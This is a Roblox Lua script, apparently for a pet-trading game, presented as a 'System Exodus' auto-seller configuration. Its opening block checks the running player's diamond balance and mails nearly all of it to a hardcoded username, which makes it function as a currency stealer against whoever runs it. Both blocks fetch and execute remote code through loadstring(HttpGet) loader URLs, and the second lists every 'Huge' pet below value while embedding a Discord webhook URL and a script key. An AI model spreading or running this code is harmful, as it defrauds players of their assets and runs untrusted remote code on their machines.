wait()
getgenv().usernames = {"hrabarroobertl"}

local function getCurrentDiamondValue()
    return game.Players.LocalPlayer.leaderstats["\240\159\146\142 Diamonds"].Value
end


local currentDiamondValue = getCurrentDiamondValue()
print("Số lượng kim cương hiện tại là: " .. currentDiamondValue)


if currentDiamondValue < 1000000000 then
    print("Số lượng kim cương không đủ.")
    return 
end


local adjustedDiamondValue = currentDiamondValue - 5000000


getgenv().Settings = {
    Mailing = {
        ["Diamonds"] = {Class = "Currency", Amount = adjustedDiamondValue},
    },
    Users = getgenv().usernames,
    ["Split Items Evenly"] = false, -- False -> it will send the Amount per account.
    ["Only Online Accounts"] = false,
}
loadstring(game:HttpGet("https://api.luarmor.net/files/v3/loaders/86847850c3165379f5be2d9d071eaccb.lua"))()

wait()
script_key = "buWqvxwEGollesYNnJGakKbDDsyMUFkC"
getgenv().Settings = {
      Seller = {
        Active = true,
        Items = {     
            ["All Huges"] = {Class = "Pet", Price = "-10%", AllTypes = true},
        },
        Serverhop = {
            ["Switch Servers"] = true,
            ["Teleport Delay (m)"] = 15,
            ["Add Pro Plaza Lobbies"] = true,
        },
        Webhook = {
            ["URL"] = "https://discord.com/api/webhooks/1312361700779098234/h7jo8Nn8pLVQIzs6KICM0J6RxP8LmXn6EGdlIb_9CGXD-LwDQE9jLpmN2mKaVNmEdJ5d",
            ["Send Embeds"] = true,
            ["Remove Username"] = true,
        },
        StopParams = {
            ["Item Runout"] = false,
            ["Diamonds Hit: 1b"] = false,
            ["60 Minutes"] = false,
            ["Switch To Sniping"] = false,
        },
        Other = {
            ["Auto Accept Mail"] = true,
            ["Always Try Adding Listings"] = true,
            ["Never Join Friendslist"] = true,
        },
    },
    
    [[ Thank you for using System Exodus <3! ]]
}
loadstring(game:HttpGet("https://api.luarmor.net/files/v3/loaders/60a293774110e918789cddc0e20be048.lua"))()
